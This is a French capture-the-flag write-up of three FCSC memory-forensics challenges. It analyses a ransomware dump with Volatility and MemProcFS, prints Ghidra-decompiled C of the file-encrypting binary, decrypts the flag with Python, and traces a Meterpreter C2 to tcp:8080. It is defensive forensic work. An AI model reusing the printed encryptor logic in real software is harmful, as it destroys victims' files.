# Ransomémoire 0/3 - Pour commencer

## Énoncé

Vous vous préparez à analyser une capture mémoire et vous notez quelques informations sur la machine avant de plonger dans l'analyse :
- nom d'utilisateur,
- nom de la machine,
- navigateur utilisé.

Le flag est au format `FCSC{<nom d'utilisateur>:<nom de la machine>:<nom du navigateur>}` où :
- `<nom d'utilisateur>` est le nom de l'utilisateur qui utilise la machine,
- `<nom de la machine>` est le nom de la machine analysée et
- `<nom du navigateur>` est le nom du navigateur en cours d'exécution.

Par exemple : `FCSC{toto:Ordinateur-de-jojo:Firefox}`.

**Attention** : pour cette épreuve, vous n'avez que 10 tentatives de flag.

## Solution

Un coup de `strings` sur le dump monter que c'est du Windows. On sort l'habituel [volatility](https://github.com/volatilityfoundation/volatility3) pour regarder de plus près :

```
$ /opt/volatility3/vol.py -f fcsc.dmp windows.sessions.Sessions
[...]
1	Console	4072	brave.exe	DESKTOP-PI234GP/Admin	2023-04-17 17:21:31.000000 
1	Console	5064	brave.exe	DESKTOP-PI234GP/Admin	2023-04-17 17:21:39.000000 
1	Console	3952	brave.exe	DESKTOP-PI234GP/Admin	2023-04-17 17:21:44.000000 
[...]
```

On en déduit que le flag est `FCSC{Admin:DESKTOP-PI234GP:brave}`.


# Ransomémoire 1/3 - Mon précieux

## Énoncé

Vous étiez en train de consulter vos belles photos de chats quand patatra, votre fichier super secret sur votre Bureau change d'extension et devient illisible...

Vous faites une capture mémoire pour comprendre ce qu'il s'est passé, dans le but de récupérer ce précieux fichier.

**Attention** : pour cette épreuve, vous n'avez que 10 tentatives de flag.

## Solution

> Note: résolue après la fin du CTF. Je me suis acharné pendant plusieurs jours sur cette épreuve en utilisant [Volatility3](https://github.com/volatilityfoundation/volatility3), 
> en vain. À l'issue du CTF, on m'a conseillé d'essayer [MemProcFs](https://github.com/ufrisk/MemProcFS) et... D'accord, j'avais compris des choses déjà, mais en
> très peu de temps, il m'a sorti ce qui me manquait. Il devient mon outil de forensic préféré.

On lance MemProcFs sur l'image, et on commence à investiguer. D'abord, on regarde la liste des processus, 
dans `sys/proc/proc-v.txt`. Et immédiatement, on trouve un process louche :
```
----- svchost.exe             5540   6424     U* Admin            \Device\HarddiskVolume2\Windows\Temp\svchost.exe
                                                                  C:\Windows\Temp\svchost.exe
                                                                  C:\Windows\Temp\svchost.exe
                                                                  2023-04-17 17:21:18 UTC ->                     ***
                                                                  Medium
```

Un `scvhost.exe` dans `C:\Windows\Temp` ? C'est bizarre. Allons désassembler ce binaire qui se trouve
sous [`pid/5540/files/modules/svchost.exe`](svchost.exe). Pour cela, j'utilise [Ghidra](https://github.com/NationalSecurityAgency/ghidra/). On se rend compte rapidement 
que le binaire semble chiffrer des fichiers. Creusons un peu plus...

La fonction principale pour commencer (`FUN_00401320`) :
```C
undefined8 FUN_00401320(void)
{
  bool bVar1;
  BOOL BVar2;
  HANDLE pvVar3;
  undefined7 extraout_var;
  byte bVar4;
  UCHAR local_728 [112];
  WCHAR local_6b8 [264];
  WCHAR local_4a8 [264];
  _WIN32_FIND_DATAW local_298;
  
  BVar2 = SHGetSpecialFolderPathW((HWND)0x0,local_6b8,0,0);
  if (BVar2 != 0) {
    bVar4 = 0;
    lstrcatW(local_6b8,L"\\");
    while (bVar1 = FUN_00401040(local_728,100), (int)CONCAT71(extraout_var,bVar1) != 0) {
      lstrcpyW(local_4a8,local_6b8);
      lstrcatW(local_4a8,L"*.fcsc");
      pvVar3 = FindFirstFileW(local_4a8,&local_298);
      if (pvVar3 != (HANDLE)0x0) {
        FUN_00401130((longlong)local_728,100,local_6b8,local_298.cFileName,bVar4);
      }
      bVar4 = bVar4 + 1;
      Sleep(10000);
    }
  }
  return 0;
}
```

La fonction :
- ouvre un répertoire pointé par un CSIDL.
- appelle en boucle `FUN_00401040`, et à chaque fois :
- recherche un fichier `*.fcsc` dans le répertoire trouvé
- appelle `FUN_00401130` sur le fichier, avec une donnée retournée par `FUN_00401040`.


Voyons la première des deux autres fonctions référencées (`FUN_00401040`) :
```C
bool FUN_00401040(PUCHAR param_1,ULONG param_2)
{
  NTSTATUS NVar1;
  BOOL BVar2;
  HANDLE hFile;
  ULONG local_22c;
  WCHAR local_228 [264];
  
  wsprintfW(local_228,L"C:\\Windows\\Temp\\MsCmdRun%d.log");
  NVar1 = BCryptGenRandom((BCRYPT_ALG_HANDLE)0x0,param_1,param_2,2);
  if (NVar1 == 0) {
    hFile = CreateFileW(local_228,0x40000000,0,(LPSECURITY_ATTRIBUTES)0x0,2,0x80,(HANDLE)0x0);
    if (hFile != (HANDLE)0xffffffffffffffff) {
      BVar2 = WriteFile(hFile,param_1,param_2,&local_22c,(LPOVERLAPPED)0x0);
      if (BVar2 != 0) {
        CloseHandle(hFile);
        return local_22c == param_2;
      }
      CloseHandle(hFile);
      return false;
    }
  }
  return false;
}
```

Cette fonction génère un nombre aléatoire et le stocke dans un fichier `C:\Windows\Temp\MsCmdRunXXX.log`.


Et la dernière (`FUN_00401320`) :
```C
uint FUN_00401130(longlong param_1,uint param_2,LPCWSTR param_3,LPCWSTR param_4,byte param_5)
{
  BOOL BVar1;
  DWORD DVar2;
  uint uVar3;
  HANDLE hObject;
  HANDLE pvVar4;
  LPVOID lpBuffer;
  ulonglong uVar5;
  uint uVar6;
  DWORD local_46c;
  WCHAR local_468 [264];
  DWORD local_258 [134];
  
  uVar3 = 0;
  lstrcpyW(local_468,param_3);
  lstrcatW(local_468,param_4);
  hObject = CreateFileW(local_468,0xc0000000,0,(LPSECURITY_ATTRIBUTES)0x0,3,0x80,(HANDLE)0x0);
  if (hObject != (HANDLE)0xffffffffffffffff) {
    pvVar4 = GetProcessHeap();
    lpBuffer = HeapAlloc(pvVar4,8,(ulonglong)param_2);
    if (lpBuffer == (LPVOID)0x0) {
      CloseHandle(hObject);
    }
    else {
      while (BVar1 = ReadFile(hObject,lpBuffer,param_2,local_258,(LPOVERLAPPED)0x0), BVar1 != 0) {
        if (local_258[0] == 0) {
          uVar6 = 0;
          goto LAB_004012a2;
        }
        if (param_2 != 0) {
          uVar5 = 0;
          do {
            *(byte *)((longlong)lpBuffer + uVar5) =
                 *(byte *)((longlong)lpBuffer + uVar5) ^ *(byte *)(param_1 + uVar5) ^ param_5;
            uVar5 = uVar5 + 1;
          } while (param_2 != uVar5);
        }
        DVar2 = SetFilePointer(hObject,-local_258[0],(PLONG)0x0,1);
        if (((DVar2 == 0xffffffff) ||
            (BVar1 = WriteFile(hObject,lpBuffer,local_258[0],&local_46c,(LPOVERLAPPED)0x0),
            BVar1 == 0)) || (local_258[0] != local_46c)) break;
      }
      uVar6 = 1;
LAB_004012a2:
      pvVar4 = GetProcessHeap();
      HeapFree(pvVar4,0,lpBuffer);
      CloseHandle(hObject);
      lstrcpyW((LPWSTR)local_258,local_468);
      lstrcatW((LPWSTR)local_258,L".enc");
      uVar3 = MoveFileW(local_468,(LPCWSTR)local_258);
      if (uVar3 != 0) {
        uVar3 = uVar6 ^ 1;
      }
    }
  }
  return uVar3;
}
```

Plus longue, mais en gros, cette fonction chiffre le fichier `.fscs` avec la clef passée en paramètre.
Le chiffrement est un XOR octet par octet entre le fichier, la clef, et un indice (probablement le même)
que celui du nom du fichier `MsCmdRunXXX` qui contient la clef. Le résultat est écrit directement dans le
fichier, et celui-ci est renommé avec l'extension `.enc`.

C'est le moment de chercher si on peut retrouver les fichiers `.enc` qui ont été chiffrés. Pour cela, on
active la fonction `forensic` de `MemProcFs` et on ouvre `forensic/timeline/timeline_all.txt`. Il n'y a
pas beaucoup de fichiers chiffrés. Un seul en fait, et on trouve le fichier de la clef juste à côté :

```
2023-04-17 17:23:50 UTC  NTFS   CRE         0       100         45022000 \.\Windows\Temp\MsCmdRun14.log
2023-04-17 17:23:50 UTC  NTFS   MOD         0        71          1327400 \ORPHAN\$119\Desktop\flag.fcsc.enc
```

Ça tombe bien, vu le le nom, c'est un fichier qui contient probablement le flag.
Peut-on retrouver ces deux fichiers ? Oui, évidemment !

```
$ hexdump forensic/ntfs/ORPHAN/\$119/Desktop/flag.fcsc.enc 
0000000 653b 1917 0364 9f71 1add ec30 ba37 c983
0000010 b01b c944 058d 8845 41ff d640 e532 0961
0000020 f25f 0732 6a44 058d fec7 2f82 7622 089a
0000030 2832 ad7a 90ff 4dc8 ca96 5499 2c1c f758
0000040 8b7a c5e5 515d 005a        
$ hexdump  forensic/ntfs/_/Windows/Temp/MsCmdRun14.log 
0000000 2873 544a 3a11 a748 26b5 860b 8501 a5bc
0000010 8773 a42b 3db1 b779 7cc5 e82a da5a 6609
0000020 cb68 3a5f 5672 3ce5 c5ab 16b5 491e 37a6
0000030 155e c743 adc1 72f0 f3fb 6df3 4673 9b67
0000040 b246 fcdb 226a 895e 588e 0b7d e55c d84a
0000050 5862 8772 36ee 44f5 5549 bd0f 00c0 58e1
0000060 5f60 0f1e                              
0000064
```

À l'aide de [flag.fcsc.enc](flag.fcsc.enc), [MsCmdRun14.log](MsCmdRun14.log) et trois lignes de python, le flag est retrouvé :
```python
$ python
Python 3.10.6 (main, Mar 10 2023, 10:55:28) [GCC 11.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> key = open(f'MsCmdRun14.log', 'rb').read()
>>> encrypted = open(f'flag.fcsc.enc', 'rb').read()
>>> bytes([ x ^ y ^ 14 for x, y in zip(key, encrypted)])
b'FCSC{776f25d811bf9ac262143d0f1fa97c382f7b5972121b37d0361c7d7ad1b27079}\n'
```


# Ransomémoire 2/3 - Début d'investigation
 
## Énoncé

Ouf, vous avez pu récupérer votre précieux fichier. Vous enquêtez maintenant sur l'origine de ce chiffrement.

Le flag est au format `FCSC{<pid>:<protocole>:<port>}` où :

- `<pid>` est l'ID du processus qui a déposé et exécuté le chiffreur et
- `<protocole>` et `<port>` sont les paramètres de la connexion avec le C2.

## Solution

> Note : résolue également après la fin du CTF, puisqu'elle était débloquée par la précédente.

On reprend la timeline, pour chercher des occurrences de notre binaire :
```
2023-04-17 17:24:14 UTC  NTFS   MOD         0         0         451ea400 \.\Windows\Temp\svchost.exe
[...]
2023-04-17 17:22:16 UTC  NTFS   RD          0         0         451ea400 \.\Windows\Temp\svchost.exe
[...]
2023-04-17 17:21:18 UTC  PROC   CRE      5540      6424 ffff818687754080 svchost.exe [Admin] \Device\HarddiskVolume2\Windows\Temp\svchost.exe
2023-04-17 17:21:16 UTC  NTFS   CRE         0         0         451ea400 \.\Windows\Temp\svchost.exe
```

L'avant dernière ligne indique que le process 6424 a créé le process 5540 (qui est notre chiffreur). C'est d'ailleurs
officiellement son père comme on l'a vu au début de l'épreuve précédente. Lui même est lancé par 3928 :

```
2023-04-16 21:47:34 UTC  PROC   CRE      6424      3928 ffff81868852e080 VBoxTray.exe [Admin] \Device\HarddiskVolume2\Windows\System32\VBoxTray.exe
```

On peut aussi regarder ce que nous dit `findevil` :
```
000   6424 VBoxTray.exe   PE_INJECT       0000022d82880000 Module:[server.dll]
0001   6424 VBoxTray.exe   PE_INJECT       0000022d828c0000 Module:[extension.dll]
0002   6424 VBoxTray.exe   PE_INJECT       0000022d82930000 Module:[extension.dll]
0003   5540 svchost.exe    PROC_PARENT     0000000000000000 ParentProcess:[VBoxTray.exe:6424]
```

Tiens, il y a eu de l'injection de DLL dans ce process. On les retrouve dans les modules dumpés
par `memprocfs` :

```
$ ls -l pid/6424/files/modules/_INJECTED*
-rw-r--r-- 1 papy papy 409600 mai    6 22:00 pid/6424/files/modules/_INJECTED-extension.dll
-rw-r--r-- 1 papy papy 409600 mai    6 22:00 pid/6424/files/modules/_INJECTED-extension.dll
-rw-r--r-- 1 papy papy 199680 mai    6 22:00 pid/6424/files/modules/_INJECTED-server.dll
```

On les balance à [VirusTotal](https://www.virustotal.com/gui/home/upload) pour avoir son avis. D'abord [_INJECTED-server.dll](_INJECTED-server.dll) :

![](server.dll.png)

Puis [_INJECTED-extension.dll](_INJECTED-extension.dll) :

![](extension.dll.png)

Ça a donc l'air d'être un [Meterpreter](https://doubleoctopus.com/security-wiki/threats-and-tools/meterpreter/). En cherchant un peu, je trouve [cet article](https://blog.f-secure.com/retrieving-meterpreter-c2-from-memory/) qui explique comment trouver les coordonnées du C2 dans un dump mémoire. La
suite d'octets `\x00\x00\xE0\x1D\x2A\x0A` donne deux résultats sur le [minidump du process 6424](minidump-6424.txt) :


```
 002b62d0:  44 04 00 00 00 00 00 00  e0 1d 2a 0a 4c 3a 09 00  D.........*.L:..
 002b62e0:  62 97 cb bd aa 74 6b 9d  32 ae 33 ac 56 9f 7d 77  b....tk.2.3.V.}w
 002b62f0:  dc a3 6d 8b 04 88 45 78  8a 93 1b 16 6f 56 15 32  ..m...Ex....oV.2
 002b6300:  74 00 63 00 70 00 3a 00  2f 00 2f 00 3a 00 38 00  t.c.p.:././.:.8.
 002b6310:  30 00 38 00 30 00 00 00  00 00 00 00 00 00 00 00  0.8.0...........
[...]
 00370ec0:  00 44 04 00 00 00 00 00  00 e0 1d 2a 0a 4c 3a 09  .D.........*.L:.
 00370ed0:  00 62 97 cb bd aa 74 6b  9d 32 ae 33 ac 56 9f 7d  .b....tk.2.3.V.}
 00370ee0:  77 dc a3 6d 8b 04 88 45  78 8a 93 1b 16 6f 56 15  w..m...Ex....oV.
 00370ef0:  32 74 00 63 00 70 00 3a  00 2f 00 2f 00 3a 00 38  2t.c.p.:././.:.8
 00370f00:  00 30 00 38 00 30 00 00  00 00 00 00 00 00 00 00  .0.8.0..........
```

On a donc toutes les infos pour flaguer : `FCSC{6424:tcp:8080}`